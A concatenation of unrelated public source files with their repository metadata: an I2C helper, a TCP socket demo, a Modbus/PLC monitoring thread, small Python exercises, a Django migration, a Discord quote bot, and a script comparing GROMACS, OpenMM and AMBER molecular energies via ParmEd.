result = self.bus.read_word_data(self.address,reg)
# Swap bytes if using big endian because read_word_data assumes little
# endian on ARM (little endian) systems.
if not little_endian:
result = ((result << 8) & 0xFF00) + (result >> 8)
if (self.debug):
print "I2C: Device 0x%02X returned 0x%04X from reg 0x%02X" % (self.address, result & 0xFFFF, reg)
return result
except IOError, err:
return self.errMsg()
def readS16(self, reg, little_endian=True):
"Reads a signed 16-bit value from the I2C device"
try:
result = self.readU16(reg,little_endian)
if result > 32767: result -= 65536
return result
except IOError, err:
return self.errMsg()
if __name__ == '__main__':
try:
bus = Raspi_I2C(address=0)
print "Default I2C bus is accessible"
except:
print "Error accessing default I2C bus"
|
[
"info@andypi.co.uk"
] |
info@andypi.co.uk
|
effc1a47e9c10e8be30971f66c7a6ff5d013ef58
|
5594de0c0417d792265a7f0ef6bd90d10ca4e9fb
|
/04-进阶语法/05-2-tdp.py
|
1bc8059a08734ad2764948c77042f7568079df17
|
[] |
no_license
|
ZHANGSTUDYNOTE/s_python
|
f0862a7e903ec5d88675743c49e5834365a4feab
|
0cd29c4bf2dc691705f79be6cf1e599cc8374fbf
|
refs/heads/master
| 2020-03-18T03:10:14.263514
| 2018-07-20T03:00:59
| 2018-07-20T03:00:59
| 134,225,952
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
import socket
# TDP服务端
def receiveData():
serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serverSocket.bind(("", 8899))
serverSocket.listen(5)
clientSocket, clientInfo = serverSocket.accept()
recvData = clientSocket.recv(1024)
print("TDP服务端")
print(clientInfo)
print(recvData)
clientSocket.close()
serverSocket.close()
# TDP客户端
def sendData():
clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
clientSocket.connect(("127.0.0.1", 6666))
clientSocket.send(b"zhang")
recvData = clientSocket.recv(1024)
print("TDP客户端")
print(recvData)
if __name__ == '__main__':
# receiveData()
sendData()
|
[
"zhangpeicheng@kobox.tv"
] |
zhangpeicheng@kobox.tv
|
e035a1a7e3bac97d9b630bf4111fd496fab954b6
|
74b975adbda2c1ed2fd27c408a3efd805f90d428
|
/modules/remote_monitor/producer.py
|
eeca1cc02a0627def58b881869c14c28196e79f2
|
[
"BSD-3-Clause"
] |
permissive
|
bijbis/GMU
|
4fa19658633a71fbb3dea07d59bedfc2210db304
|
aabac6af5f070f6314223298c10eeeda0eedf7a5
|
refs/heads/master
| 2021-01-02T09:18:48.402817
| 2017-08-02T06:58:42
| 2017-08-02T06:58:42
| 99,192,084
| 0
| 0
| null | 2017-08-07T10:25:32
| 2017-08-03T04:54:10
|
Python
|
UTF-8
|
Python
| false
| false
| 3,011
|
py
|
import threading
import struct
import time
from modbus import Modbus
from pymodbus3.exceptions import ModbusException
from plc import hotlink
import sys
import os
class ProducerThread(threading.Thread):
def __init__(self, group=None, target=None, name=None, que=None,
args=(), kwargs=None, verbose=None):
super(self.__class__, self).__init__()
self.target = target
self.name = name
self.q = que
def run(self):
# modbus = Modbus.Modbus('paulharrison.hopto.org')
modbus = Modbus.Modbus('203.59.95.40')
while True:
item_remote_monitor = []
item_plc_monitor = []
try:
# Order: [current, power, voltage]
# current_avg = modbus.read(3008, 2) # 3008 stores average current
# power_avg = modbus.read(3057, 2) # 3057 stores average power
# voltage_avg = modbus.read(3024, 2) # 3024 stores average voltage
cur_A = modbus.read(40073, 2, device='GMU')
cur_B = modbus.read(40075, 2, device='GMU')
cur_C = modbus.read(40077, 2, device='GMU')
cur_Avg = modbus.read(40071, 2, device='GMU')
vol_AB = modbus.read(40079, 2, device='GMU')
vol_BC = modbus.read(40081, 2, device='GMU')
vol_AC = modbus.read(40083, 2, device='GMU')
vol_Avg = (vol_AB + vol_BC + vol_AC) / 3.0
power = modbus.read(40091, n=2, device='GMU', scalar=0.001)
item_remote_monitor.append(cur_A)
item_remote_monitor.append(cur_B)
item_remote_monitor.append(cur_C)
item_remote_monitor.append(cur_Avg)
item_remote_monitor.append(vol_AB)
item_remote_monitor.append(vol_BC)
item_remote_monitor.append(vol_AC)
item_remote_monitor.append(vol_Avg)
item_remote_monitor.append(power)
battery_voltage = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIZ*')
item_plc_monitor.append(battery_voltage.data * 0.001)
plc_voltage = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIX*')
item_plc_monitor.append(plc_voltage.data * 0.001)
charging_current = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIL*')
item_plc_monitor.append(charging_current.data * 0.001)
plc_power = hotlink.Hotlink('http://203.59.95.40:9080/HOSTLINK/RVIY*')
item_plc_monitor.append(plc_power.data * 0.00001)
except struct.error:
print('Struct Error exception', file=sys.stderr)
os._exit(1)
except ModbusException:
print('Modbus I/O exception', file=sys.stderr)
os._exit(1)
self.q[0].put(item_remote_monitor)
self.q[1].put(item_plc_monitor)
time.sleep(60)
|
[
"mayukh2012@hotmail.com"
] |
mayukh2012@hotmail.com
|
63d8c16ac32d0421456ac272c279a8206acf14a7
|
c9bf4827148182056f50d61fa1488122858b06b5
|
/Python/Act_05/08.py
|
321a8edc4c74c6ddfc1a8211fb4f1c6b6598cd23
|
[] |
no_license
|
borjamoll/programacion
|
6501bfe8aa84e70e23a7d4dcf7c6292ae0f95d6a
|
279dd5434b4021fd12d4ddf59eb03151bc5bc8bb
|
refs/heads/master
| 2020-09-14T18:29:16.141150
| 2019-12-11T16:00:50
| 2019-12-11T16:00:50
| 223,214,669
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 221
|
py
|
h=int(input('La altura, crack. '))
halt=1
for i in range (h):
asteriscos=halt*"*"
halt=halt+1
print (asteriscos)
halt=halt-1
for i in range (h-1):
halt=halt-1
asteriscos=halt*"*"
print (asteriscos)
|
[
"alumnedani@gmail.com"
] |
alumnedani@gmail.com
|
70e6763a7167494af1c8fa99208ce394137e55b8
|
0b0d3246d39974cb8faff7d269da2d539415afab
|
/problem_python/p99.py
|
948d0f8a4a30b16af95eec8908145aaf64df0eff
|
[] |
no_license
|
xionghhcs/leetcode
|
972e7ae4ca56b7100223630b294b5a97ba5dd7e8
|
8bd43dcd995a9de0270b8cea2d9a48df17ffc08b
|
refs/heads/master
| 2020-03-07T17:18:08.465559
| 2019-09-29T11:11:26
| 2019-09-29T11:11:26
| 127,607,564
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 977
|
py
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def recoverTree(self, root: TreeNode) -> None:
"""
Do not return anything, modify root in-place instead.
"""
def inOrder(root):
if root:
inOrder(root.left)
if self.preNode is not None:
if self.firstNode is None and self.preNode.val>= root.val:
self.firstNode = self.preNode
if self.firstNode and self.preNode.val >= root.val:
self.secondNode = root
self.preNode = root
inOrder(root.right)
self.preNode = None
self.firstNode = None
self.secondNode = None
inOrder(root)
self.firstNode.val, self.secondNode.val = self.secondNode.val, self.firstNode.val
|
[
"xionghhcs@163.com"
] |
xionghhcs@163.com
|
b40bfde73e320dcb6f3a2b87ac5dceae370b147e
|
89c06ba007070ad07bd98798194d496c06f99fc9
|
/content/migrations/0002_content_author.py
|
9ca0e322587d2983ff04c2ca0bdd7f0f08801d4a
|
[] |
no_license
|
srcemre/Django-HotelResarvation
|
ac21bab7ef6f9162b6a127837dc18b4f523ee275
|
71731b09a30e51197a0b93f07dd0096534638e0d
|
refs/heads/master
| 2022-12-08T01:33:12.897852
| 2020-09-06T20:03:06
| 2020-09-06T20:03:06
| 251,089,317
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 404
|
py
|
# Generated by Django 3.0.3 on 2020-05-15 05:24
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('content', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='content',
name='author',
field=models.CharField(blank=True, default='admin', max_length=255),
),
]
|
[
"45533044+srcemre@users.noreply.github.com"
] |
45533044+srcemre@users.noreply.github.com
|
12a4fd41cd8308535a4ab2aae60f7a30b29dd050
|
5a3ec63587a3948928d735dca46792cadcb14170
|
/bofh.py
|
7f0d7859544348d8436e8732193a50f18665e818
|
[
"MIT"
] |
permissive
|
andrsd/discord-bofh-bot
|
9b9818a13d2e80f840f65d4f7a18eea41a75df9e
|
59b6d3f36086b127b13bf9e3891f9cc21009b67f
|
refs/heads/main
| 2023-01-21T22:53:56.270532
| 2020-12-05T15:34:07
| 2020-12-05T16:06:16
| 316,242,347
| 10
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
"""
BOFH - Bastard Operator From Hell
Bot for Discord
"""
import os
import random
import discord
from discord.ext import commands
from dotenv import load_dotenv
from excuses import excuses
load_dotenv()
TOKEN = os.getenv('DISCORD_TOKEN')
bot = commands.Bot(command_prefix='!')
@bot.command(name='bofh', help='Responds with a random Bastard Operator From Hell quote')
async def bofh_quote(ctx):
response = random.choice(excuses)
await ctx.send(response)
@bot.command(name='topic-bofh', help='Sets the channel topic to a random Bastard Operator From Hell quote')
async def bofh_channel_topic(ctx):
response = random.choice(excuses)
if hasattr(ctx.channel, "edit"):
await ctx.channel.edit(topic=response)
bot.run(TOKEN)
|
[
"david.andrs@inl.gov"
] |
david.andrs@inl.gov
|
3d66ab6e1d1bc37c7984efb9fb66543357e2d7b5
|
d75cb3c2c5e06ab4057c60bb311c367c8f299a0a
|
/ctest.py
|
079d82bc4ebaac105a6f88604054be7b02be2ce2
|
[
"MIT"
] |
permissive
|
kmckiern/AMBER-FB15
|
2d7c8b2e19ad1d3abaf04437a16b6fcf01d6d206
|
9ef44ac2e03bdc0280d986bd220dea741d68d4df
|
refs/heads/master
| 2020-03-28T21:01:31.324309
| 2015-08-18T01:56:50
| 2015-08-18T01:56:50
| 39,044,777
| 0
| 0
| null | 2015-07-14T00:38:45
| 2015-07-14T00:38:45
| null |
UTF-8
|
Python
| false
| false
| 25,088
|
py
|
#!/usr/bin/env python
"""
Test ParmEd's ability to process a Gromacs position/topology file
by comparing Gromacs energy/force to OpenMM-via-ParmEd energy/force.
This script contains bits of ForceBalance to obtain the Gromacs energy/force
and also reads parts of the Gromacs .mdp file to set up the system.
There are also some OpenMM imports for calculating the OpenMM energy/force..
To run this script, provide a gro, top and mdp file. The difference from
test.py is that this script also runs AMBER.
Author: Lee-Ping Wang
"""
# General import
from collections import OrderedDict
import numpy as np
import os, sys, re, copy
import argparse
# ForceBalance convenience functions
from nifty import printcool, printcool_dictionary, _exec, which, wopen, isint, isfloat, logger
# Only needed for writing constrained .gro files
# from molecule import Molecule
# ParmEd import
from parmed import gromacs, amber
from parmed.amber.mdin import Mdin
from parmed.charmm import CharmmPsfFile, CharmmCrdFile, CharmmParameterSet
# OpenMM import
import simtk.unit as u
import simtk.openmm as mm
import simtk.openmm.app as app
parser = argparse.ArgumentParser()
parser.add_argument('-a', '--amber', action='store_true', help='Pass this flag to run AMBER tests along with Gromacs / OpenMM.')
parser.add_argument('-c', '--charmm', action='store_true', help='Pass this flag to run CHARMM tests along with Gromacs / OpenMM and maybe AMBER.')
args, sys.argv = parser.parse_known_args(sys.argv)
# Gromacs settings
gmxsuffix="_d"
if which('gmx'+gmxsuffix) != '':
logger.info("Using double precision GROMACS version 5\n")
gmxpath = which('gmx'+gmxsuffix)
GMXVERSION = 5
elif which('mdrun'+gmxsuffix) != '':
logger.info("Using double precision GROMACS version 4\n")
gmxpath = which('mdrun'+gmxsuffix)
GMXVERSION = 4
else:
gmxsuffix=""
if which('gmx'+gmxsuffix) != '':
logger.info("Using single precision GROMACS version 5\n")
gmxpath = which('gmx'+gmxsuffix)
GMXVERSION = 5
elif which('mdrun'+gmxsuffix) != '':
logger.info("Using single precision GROMACS version 4\n")
gmxpath = which('mdrun'+gmxsuffix)
GMXVERSION = 4
else:
logger.error("Cannot find the GROMACS executables!\n")
raise RuntimeError
os.environ["GMX_MAXBACKUP"] = "-1"
os.environ["GMX_NO_SOLV_OPT"] = "TRUE"
os.environ["GMX_NO_ALLVSALL"] = "TRUE"
gmxprogs = ["anadock", "anaeig", "analyze", "angle", "bar", "bond", "bundle", "chi",
"cluster", "clustsize", "confrms", "covar", "current", "enemat", "energy",
"filter", "gyrate", "h2order", "hbond", "helix", "helixorient", "hydorder",
"kinetics", "lie", "luck", "mdmat", "membed", "mindist", "morph", "msd",
"nmeig", "nmens", "nmtraj", "options", "order", "pme_error", "polystat",
"potential", "principal", "protonate", "rama", "rdf", "rms", "rmsdist",
"rmsf", "rotacf", "rotmat", "saltbr", "sans", "sas", "select", "sgangle",
"sham", "sigeps", "sorient", "spatial", "spol", "tcaf", "traj", "tune_pme",
"vanhove", "velacc", "wham", "wheel", "x2top"]
def edit_mdp(fin=None, fout=None, options={}, defaults={}, verbose=False):
"""
Read, create or edit a Gromacs MDP file. The MDP file contains GROMACS run parameters.
If the input file exists, it is parsed and options are replaced where "options" overrides them.
If the "options" dictionary contains more options, they are added at the end.
If the "defaults" dictionary contains more options, they are added at the end.
Keys are standardized to lower-case strings where all dashes are replaced by underscores.
The output file contains the same comments and "dressing" as the input.
Also returns a dictionary with the final key/value pairs.
Parameters
----------
fin : str, optional
Input .mdp file name containing options that are more important than "defaults", but less important than "options"
fout : str, optional
Output .mdp file name.
options : dict, optional
Dictionary containing mdp options. Existing options are replaced, new options are added at the end, None values are deleted from output mdp.
defaults : dict, optional
defaults Dictionary containing "default" mdp options, added only if they don't already exist.
verbose : bool, optional
Print out additional information
Returns
-------
OrderedDict
Key-value pairs combined from the input .mdp and the supplied options/defaults and equivalent to what's printed in the output mdp.
"""
clashes = ["pbc"]
# Make sure that the keys are lowercase, and the values are all strings.
options = OrderedDict([(key.lower().replace('-','_'), str(val) if val is not None else None) for key, val in options.items()])
# List of lines in the output file.
out = []
# List of options in the output file.
haveopts = []
# List of all options in dictionary form, to be returned.
all_options = OrderedDict()
if fin is not None and os.path.isfile(fin):
for line in open(fin).readlines():
line = line.strip().expandtabs()
# The line structure should look something like this:
# key = value ; comments
# First split off the comments.
if len(line) == 0:
out.append('')
continue
s = line.split(';',1)
data = s[0]
comms = s[1] if len(s) > 1 else None
# Pure comment lines or empty lines get appended to the output.
if set(data).issubset([' ']):
out.append(line)
continue
# Now split off the key and value fields at the equals sign.
keyf, valf = data.split('=',1)
key = keyf.strip().lower().replace('-','_')
haveopts.append(key)
if key in options:
val = options[key]
val0 = valf.strip()
if key in clashes and val != val0:
logger.error("edit_mdp tried to set %s = %s but its original value was %s = %s\n" % (key, val, key, val0))
raise RuntimeError
# Passing None as the value causes the option to be deleted
if val is None: continue
if len(val) < len(valf):
valf = ' ' + val + ' '*(len(valf) - len(val)-1)
else:
valf = ' ' + val + ' '
lout = [keyf, '=', valf]
if comms is not None:
lout += [';',comms]
out.append(''.join(lout))
else:
out.append(line)
val = valf.strip()
all_options[key] = val
for key, val in options.items():
key = key.lower().replace('-','_')
if key not in haveopts:
haveopts.append(key)
out.append("%-20s = %s" % (key, val))
all_options[key] = val
# Fill in some default options.
for key, val in defaults.items():
key = key.lower().replace('-','_')
options[key] = val
if key not in haveopts:
out.append("%-20s = %s" % (key, val))
all_options[key] = val
if fout != None:
file_out = wopen(fout)
for line in out:
print >> file_out, line
file_out.close()
if verbose:
printcool_dictionary(options, title="%s -> %s with options:" % (fin, fout))
return all_options
def rm_gmx_baks(dir):
# Delete the #-prepended files that GROMACS likes to make
for root, dirs, files in os.walk(dir):
for file in files:
if re.match('^#',file):
os.remove(os.path.join(root, file))
def callgmx(command, stdin=None, print_to_screen=False, print_command=True, **kwargs):
# Remove backup files.
rm_gmx_baks(os.getcwd())
# Call a GROMACS program as you would from the command line.
if GMXVERSION == 5:
csplit = ('gmx ' + command.replace('gmx', '')).split()
else:
if command.split()[0] in gmxprogs:
csplit = ('g_%s' % command).split()
else:
csplit = command.split()
prog = os.path.join(gmxpath, csplit[0])
csplit[0] = prog + gmxsuffix
return _exec(' '.join(csplit), stdin=stdin, print_to_screen=print_to_screen, print_command=print_command, **kwargs)
def energy_termnames(edrfile):
""" Get a list of energy term names from the .edr file by parsing a system call to g_energy. """
if not os.path.exists(edrfile):
logger.error('Cannot determine energy term names without an .edr file\n')
raise RuntimeError
## Figure out which energy terms need to be printed.
o = callgmx("energy -f %s -xvg no" % (edrfile), stdin="Total-Energy\n", copy_stdout=False, copy_stderr=True)
parsemode = 0
energyterms = OrderedDict()
for line in o:
s = line.split()
if "Select the terms you want from the following list" in line:
parsemode = 1
if parsemode == 1:
if len(s) > 0 and all([isint(i) for i in s[::2]]):
parsemode = 2
if parsemode == 2:
if len(s) > 0:
try:
if all([isint(i) for i in s[::2]]):
for j in range(len(s))[::2]:
num = int(s[j])
name = s[j+1]
energyterms[name] = num
except: pass
return energyterms
def energy_components(Sim, verbose=False):
# Before using EnergyComponents, make sure each Force is set to a different group.
EnergyTerms = OrderedDict()
if type(Sim.integrator) in [mm.LangevinIntegrator, mm.VerletIntegrator]:
for i in range(Sim.system.getNumForces()):
EnergyTerms[Sim.system.getForce(i).__class__.__name__] = Sim.context.getState(getEnergy=True,groups=2**i).getPotentialEnergy() / u.kilojoules_per_mole
EnergyTerms['Potential'] = Sim.context.getState(getEnergy=True).getPotentialEnergy() / u.kilojoules_per_mole
return EnergyTerms
def interpret_mdp(mdp_file):
# Keyword args to pass to createSystem()
sysargs = {}
# Read stuff from the Gromacs .mdp file
# to inform how we build the OpenMM System
mdp_opts = edit_mdp(mdp_file)
if 'define' in mdp_opts:
defines = dict([(k.replace("-D",''),1) for k in mdp_opts['define'].split()])
else:
defines = {}
print "Defines:", defines
sysargs['rigidWater'] = 'FLEXIBLE' not in defines
# Constraints
constraint_map = {'none':None,'h-bonds':app.HBonds,'all-bonds':app.AllBonds,'h-angles':app.HAngles}
if 'constraints' in mdp_opts:
omm_constraints = constraint_map[mdp_opts['constraints'].replace('_','-').lower()]
else:
omm_constraints = None
print "Constraints", omm_constraints
sysargs['constraints'] = omm_constraints
# Periodic boundary conditions
if mdp_opts['pbc'].lower() in ['none', 'no']:
pbc = False
elif mdp_opts['pbc'].lower() == 'xyz':
pbc = True
else:
raise RuntimeError('Unsupported PBC')
# Cut-off radii and nonbonded method
if float(mdp_opts['rcoulomb']) != float(mdp_opts['rvdw']):
raise RuntimeError('Please set rcoulomb to equal rvdw')
if 'rvdw_switch' in mdp_opts:
sysargs['switchDistance'] = mdp_opts['rvdw_switch'] * u.nanometer
if mdp_opts['coulombtype'].lower() == 'cut-off':
if float(mdp_opts['rcoulomb']) == 0.0:
sysargs['nonbondedMethod'] = app.NoCutoff
elif pbc:
sysargs['nonbondedMethod'] = app.CutoffPeriodic
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
else:
sysargs['nonbondedMethod'] = app.CutoffNonPeriodic
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
elif mdp_opts['coulombtype'].lower() == 'pme':
sysargs['nonbondedMethod'] = app.PME
sysargs['ewaldErrorTolerance'] = 1e-5
sysargs['nonbondedCutoff'] = float(mdp_opts['rcoulomb'])*u.nanometer
return defines, sysargs, mdp_opts
def Calculate_GMX(gro_file, top_file, mdp_file):
#===============================#
#| GROMACS energies and forces |#
#===============================#
# Create .mdp file for single-point energies and forces.
shot_opts = OrderedDict([("nsteps", 0), ("nstxout", 0), ("nstxtcout", 0), ("nstenergy", 1), ("nstfout", 1)])
edit_mdp(fin=mdp_file, fout="enerfrc.mdp", options=shot_opts)
# Call grompp to set up calculation.
callgmx("grompp -f enerfrc.mdp -c %s -p %s -maxwarn 1" % (gro_file, top_file))
# Run gmxdump to determine which atoms are real.
o = callgmx("gmxdump -s topol.tpr -sys", copy_stderr=True)
AtomMask = []
for line in o:
line = line.replace("=", "= ")
if "ptype=" in line:
s = line.split()
ptype = s[s.index("ptype=")+1].replace(',','').lower()
AtomMask.append(ptype=='atom')
# Get the energy and the forces.
callgmx("mdrun -nt 1 -rerunvsite -rerun %s" % gro_file)
callgmx("energy -xvg no -f ener.edr -o energy.xvg", stdin='Potential')
Efile = open("energy.xvg").readlines()
GMX_Energy = np.array([float(Eline.split()[1]) for Eline in Efile])
callgmx("traj -xvg no -s topol.tpr -f traj.trr -of force.xvg -fp", stdin='System')
GMX_Force = np.array([[float(j) for i, j in enumerate(line.split()[1:]) if AtomMask[i/3]] \
for line in open("force.xvg").readlines()])
# Perform energy component analysis and return properties.
energyterms = energy_termnames("ener.edr")
ekeep = [k for k,v in energyterms.items() if v <= energyterms['Total-Energy']]
callgmx("energy -f ener.edr -o energy.xvg -xvg no", stdin="\n".join(ekeep))
ecomp = OrderedDict()
for line in open("energy.xvg"):
s = [float(i) for i in line.split()]
for i in range(len(ekeep) - 2):
val = s[i+1]
if ekeep[i] in ecomp:
ecomp[ekeep[i]].append(val)
else:
ecomp[ekeep[i]] = [val]
Ecomps_GMX = OrderedDict([(key, val[0]) for key, val in ecomp.items()])
return GMX_Energy[0], GMX_Force, Ecomps_GMX
def Calculate_ParmEd_OpenMM(gro_file, top_file, sysargs, defines):
#===============================#
#| ParmEd object creation |#
#===============================#
# Make sure the proper defines from the .mdp file are passed into the GromacsTopologyFile() :)
ParmEd_GmxTop = gromacs.GromacsTopologyFile(top_file, defines=defines)
ParmEd_GmxGro = gromacs.GromacsGroFile.parse(gro_file)
ParmEd_GmxTop.box = ParmEd_GmxGro.box
ParmEd_GmxTop.positions = ParmEd_GmxGro.positions
#===============================#
#| OpenMM simulation setup |#
#===============================#
# ParmEd creates System object
system = ParmEd_GmxTop.createSystem(**sysargs)
# Keep a record of which atoms are real (not virtual sites)
isAtom = []
for i in range(system.getNumParticles()):
isAtom.append(system.getParticleMass(i).value_in_unit(u.dalton) > 0.0)
# Setting force groups enables energy components analysis
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, mm.NonbondedForce):
f.setUseDispersionCorrection(True)
elif isinstance(f, mm.CustomNonbondedForce):
f.setUseLongRangeCorrection(True)
integ = mm.VerletIntegrator(1.0*u.femtosecond)
plat = mm.Platform.getPlatformByName('Reference')
# Create Simulation object
simul = app.Simulation(ParmEd_GmxTop.topology, system, integ, plat)
simul.context.setPositions(ParmEd_GmxGro.positions)
simul.context.applyConstraints(1e-12)
# Obtain OpenMM potential energy
state = simul.context.getState(getPositions=True,getEnergy=True,getForces=True)
parmed_energy = state.getPotentialEnergy()
parmed_forces = state.getForces()
pos = np.array(state.getPositions().value_in_unit(u.angstrom)).reshape(-1,3)
# Obtain and save constrained positions
# M = Molecule(gro_file)
# M.xyzs[0] = pos
# M.write('constrained.gro')
# Print OpenMM-via-ParmEd energy components
Ecomps_OMM = energy_components(simul)
printcool_dictionary(Ecomps_OMM, title="OpenMM energy components via ParmEd")
parmed_forces = np.array([f for i, f in enumerate(parmed_forces.value_in_unit(u.kilojoule_per_mole/u.nanometer)) if isAtom[i]])
return ParmEd_GmxTop, parmed_energy, parmed_forces, Ecomps_OMM
def Calculate_AMBER(Structure, mdp_opts):
pbc = mdp_opts["pbc"].lower() == "xyz"
# Create AMBER inpcrd file
inpcrd = amber.AmberAsciiRestart("inpcrd", mode="w")
inpcrd.coordinates = np.array(Structure.positions.value_in_unit(u.angstrom)).reshape(-1,3)
inpcrd.box = Structure.box
inpcrd.close()
# sander insists on providing a trajectory to iterate over,
# so we feed it the same coordinates again. But we don't use it
# because the positions are imprecise.
mdcrd = amber.AmberMdcrd("mdcrd", natom=len(Structure.atoms), hasbox=pbc, mode="w")
mdcrd.add_coordinates(np.array(Structure.positions.value_in_unit(u.angstrom)).reshape(-1,3))
if pbc:
mdcrd.add_box(Structure.box[:3])
mdcrd.close()
# Create AMBER prmtop object from ParmEd Structure :)
prmtop = amber.AmberParm.from_structure(Structure)
prmtop.write_parm("prmtop")
# Create AMBER mdin file and append some stuff
mdin = Mdin()
# Single point energies?
mdin.change('cntrl','imin','5')
# Periodic boundary conditions?
if pbc:
mdin.change('cntrl','ntb','1')
else:
mdin.change('cntrl','ntb','0')
# Cutoff zero is really infinite
if float(mdp_opts['rlist']) == 0.0:
mdin.change('cntrl','cut','9999')
else:
mdin.change('cntrl','cut',str(int(float(mdp_opts['rlist'])*10)))
# Take zero MD steps
mdin.change('cntrl','nstlim','0')
# Don't update nonbond parameters
mdin.change('cntrl','nsnb','0')
# if mdp_opts['coulombtype'].lower() == 'pme':
# mdin.change('ewald','order',5)
# mdin.change('ewald','skinnb',0)
mdin.write("mdin")
# Nonbonded method
if mdp_opts['coulombtype'].lower() == 'pme':
with open("mdin",'a') as f:
print >> f, """&ewald
order=5, skinnb=0
/"""
with open("mdin",'a') as f:
print >> f, """&debugf
do_debugf=1, dumpfrc=1
/"""
# Call sander for energy and force
os.system('rm -f forcedump.dat')
_exec("sander -O -y mdcrd", print_command=False)
# Parse energy and force
ParseMode = 0
Energies = []
Forces = []
Force = []
iatom = 0
isAtom = [atom.atomic_number > 0 for atom in Structure.atoms]
for line in open('forcedump.dat'):
line = line.strip()
sline = line.split()
if ParseMode == 1:
if len(sline) == 1 and isfloat(sline[0]):
Energies.append(float(sline[0]) * 4.184)
ParseMode = 0
if ParseMode == 2:
if len(sline) == 3 and all(isfloat(sline[i]) for i in range(3)):
if isAtom[iatom]:
Force += [float(sline[i]) * 4.184 * 10 for i in range(3)]
iatom += 1
if len(Force) == 3*sum(isAtom):
Forces.append(np.array(Force))
Force = []
ParseMode = 0
iatom = 0
if line == '0 START of Energies':
ParseMode = 1
elif line == '1 Total Force' or line == '2 Total Force':
ParseMode = 2
# Obtain energy components
ParseMode = 0
Ecomps = OrderedDict()
for line in open("mdout").readlines():
if "NSTEP = " in line:
ParseMode = 1
if ParseMode == 1:
if "=" not in line:
ParseMode = 0
continue
else:
ieq = None
wkey = []
# Assume the line is split-able
for i, w in enumerate(line.split()):
if w == '=':
ieq = i
elif i-1 == ieq:
Ecomps.setdefault(' '.join(wkey), []).append(float(w)*4.184)
wkey = []
else:
wkey.append(w)
Ecomps_Sav = OrderedDict()
for key in Ecomps:
if set(Ecomps[key]) == set([0.0]): continue
elif key.lower() in ['eptot', 'etot', 'volume', 'density']: continue
else:
Ecomps_Sav[key] = Ecomps[key][0]
Ecomps_Sav['EPTOT'] = Ecomps['EPtot'][0]
# Save just the first frame from the .mdcrd
Energies = Energies[0]
Forces = Forces[0]
return Energies, Forces, Ecomps_Sav
def Calculate_CHARMM(params, psf, crd, sysargs, defines):
# Compute the box dimensions from the coordinates and set the box lengths (only
# orthorhombic boxes are currently supported in OpenMM)
coords = crd.positions
# Create the OpenMM system
system = psf.createSystem(params, **sysargs)
# Keep a record of which atoms are real (not virtual sites)
isAtom = []
for i in range(system.getNumParticles()):
isAtom.append(system.getParticleMass(i).value_in_unit(u.dalton) > 0.0)
# Setting force groups enables energy components analysis
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, mm.NonbondedForce):
f.setUseDispersionCorrection(True)
elif isinstance(f, mm.CustomNonbondedForce):
f.setUseLongRangeCorrection(True)
integ = mm.VerletIntegrator(1.0*u.femtosecond)
plat = mm.Platform.getPlatformByName('Reference')
# Create Simulation object
simul = app.Simulation(psf.topology, system, integ, plat)
simul.context.setPositions(coords)
simul.context.applyConstraints(1e-12)
# Obtain OpenMM potential energy
state = simul.context.getState(getPositions=True,getEnergy=True,getForces=True)
parmed_energy = state.getPotentialEnergy()
parmed_forces = state.getForces()
pos = np.array(state.getPositions().value_in_unit(u.angstrom)).reshape(-1,3)
Ecomps_OMM = energy_components(simul)
printcool_dictionary(Ecomps_OMM, title="CHARMM energy components via ParmEd OpenMM")
parmed_forces = np.array([f for i, f in enumerate(parmed_forces.value_in_unit(u.kilojoule_per_mole/u.nanometer)) if isAtom[i]])
return ParmEd_GmxTop, parmed_energy, parmed_forces, Ecomps_OMM
def main():
# Command line arguments
gro_file = sys.argv[1]
top_file = sys.argv[2]
mdp_file = sys.argv[3]
# Parse the .mdp file to inform ParmEd
defines, sysargs, mdp_opts = interpret_mdp(mdp_file)
# Gromacs calculation
GMX_Energy, GMX_Force, Ecomps_GMX = Calculate_GMX(gro_file, top_file, mdp_file)
GMX_Force = GMX_Force.reshape(-1,3)
# Print Gromacs energy components
printcool_dictionary(Ecomps_GMX, title="GROMACS energy components")
# ParmEd-OpenMM calculation
Structure, OMM_Energy, OMM_Force, Ecomps_OMM = Calculate_ParmEd_OpenMM(gro_file, top_file, sysargs, defines)
if args.amber:
# AMBER calculation (optional)
AMBER_Energy, AMBER_Force, Ecomps_AMBER = Calculate_AMBER(Structure, mdp_opts)
AMBER_Force = AMBER_Force.reshape(-1,3)
# Print AMBER energy components
printcool_dictionary(Ecomps_AMBER, title="AMBER energy components")
# Construct arrays of energy and force differences
if args.amber:
Names = ['Gromacs', 'OpenMM', 'AMBER']
Energies = np.array([GMX_Energy, OMM_Energy.value_in_unit(u.kilojoule_per_mole), AMBER_Energy])
Forces = np.array([GMX_Force, OMM_Force, AMBER_Force])
else:
Names = ['Gromacs', 'OpenMM']
Energies = np.array([GMX_Energy, OMM_Energy.value_in_unit(u.kilojoule_per_mole)])
Forces = np.array([GMX_Force, OMM_Force])
D_Energy = []
D_FrcRMS = []
D_FrcMax = []
D_Names = []
for i in range(1, len(Names)):
for j in range(i):
D_Names.append('%s-%s' % (Names[j],Names[i]))
D_Energy.append(Energies[j]-Energies[i])
D_Force = Forces[j]-Forces[i]
D_FrcRMS.append(np.sqrt(np.mean([sum(k**2) for k in D_Force])))
D_FrcMax.append(np.sqrt(np.max(np.array([sum(k**2) for k in D_Force]))))
# Print the net force on the first three atoms (e.g. water molecule)
# print np.sum(GMX_Force[:3], axis=0)
